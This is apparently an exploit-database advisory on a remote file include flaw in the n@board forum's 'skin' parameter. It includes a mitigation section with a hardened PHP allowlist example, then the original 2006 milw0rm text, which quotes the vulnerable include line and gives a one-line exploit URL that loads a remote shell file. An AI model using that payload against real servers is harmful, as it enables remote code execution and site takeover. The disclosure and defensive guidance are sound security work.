Vendor: n@board
By: mdx and The_Bat_Hacker
CVSS: 9.3 (HIGH)
CWE-98: Remote File Include
Product Name: n@board
Affected Version From: 3.1.9e
Affected Version To: 3.1.8tc
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

n@board v3.1.9e, 3.1.8cgb, 3.1.8tc skin Remote File Include Vulnerability

An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable application. The request carries a URL in the 'skin' parameter; because the application passes that value straight into an include statement, the URL causes a file from a remote server to be included and executed.

Mitigation:

The application should validate user input and reject anything that is not an expected value. In particular, it should accept only values from a whitelist of installed skins for the 'skin' parameter and build the include path from that list, never from the raw request value.
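As an added illustration (not n@board's code), the vulnerable pattern quoted in the raw data below, include "$skin/pnr_top.php", beside a version that applies the whitelist described above; the skin names and directory layout are assumptions, and the original presumably relied on register_globals to populate $skin from the request.

```php
<?php
// Added example, not part of n@board: hardened handling of the 'skin' parameter.
//
// Vulnerable original (as quoted in the advisory):
//     include "$skin/pnr_top.php";
// With $skin taken from the request, a URL in 'skin' is fetched and executed.
//
// Hardened version: map the request value onto a fixed list of skins that ship
// with the installation. Names and directory layout below are constructed.

declare(strict_types=1);

// Skins that actually exist on disk (assumed list for this example).
const ALLOWED_SKINS = ['default', 'classic', 'dark'];
const SKIN_BASE_DIR = __DIR__ . '/skins';

/**
 * Resolve the requested skin to a local file path, or null if it is not
 * allowlisted. Only exact matches are accepted, so URL schemes, slashes and
 * traversal sequences never reach include().
 */
function resolveSkinFile(?string $requested, string $file = 'pnr_top.php'): ?string
{
    if ($requested === null || !in_array($requested, ALLOWED_SKINS, true)) {
        return null;
    }
    $candidate = SKIN_BASE_DIR . '/' . $requested . '/' . $file;

    // Defence in depth: the resolved path must still lie under SKIN_BASE_DIR.
    $real = realpath($candidate);
    $base = realpath(SKIN_BASE_DIR);
    if ($real === false || $base === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

// Read the parameter explicitly instead of relying on register_globals.
$skinParam = $_GET['skin'] ?? 'default';
$skinFile  = resolveSkinFile(is_string($skinParam) ? $skinParam : null);
if ($skinFile === null) {
    http_response_code(400);
    exit('Unknown skin');
}
// Only an allowlisted local file can reach this include. As a second layer,
// allow_url_include=Off in php.ini stops include() from fetching URLs at all.
include $skinFile;
```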
Exploit-DB raw data:

#        n@board v3.1.9e, 3.1.8cgb ,3.1.8tc            #
#       skin Remote File Include Vulnerability         #
#                       Turkish Hacker's               #
#       Discovered By : mdx and The_Bat_Hacker         #
#                                                      #
#------------------------------------------------------
#               Cyber-Warrior TIM                      #
#         Ay ve Yıldızlar Geceye Yakışır...            #
#        the moon and the stars suit the night         #
########################################################
#
# Class : Remote
########################################################
#             File Code Detailed
#File :naboard_pnr.php?
#
#Code :
#
#include"$skin/pnr_top.php";
########################################################
#
#
# Exploit : http://www.target.***/[path]/naboard_pnr.php?skin=http://shell.txt?
#
#
########################################################
#                         _ThankX_
#
#
#
#Cyber-warrior User ,PROHACK, Siber-korsanlar [redx, dipsomania, k.z.l_alev]
#Shika, xoron , real_dark_boy, All Friends
########################################################

# milw0rm.com [2006-10-11]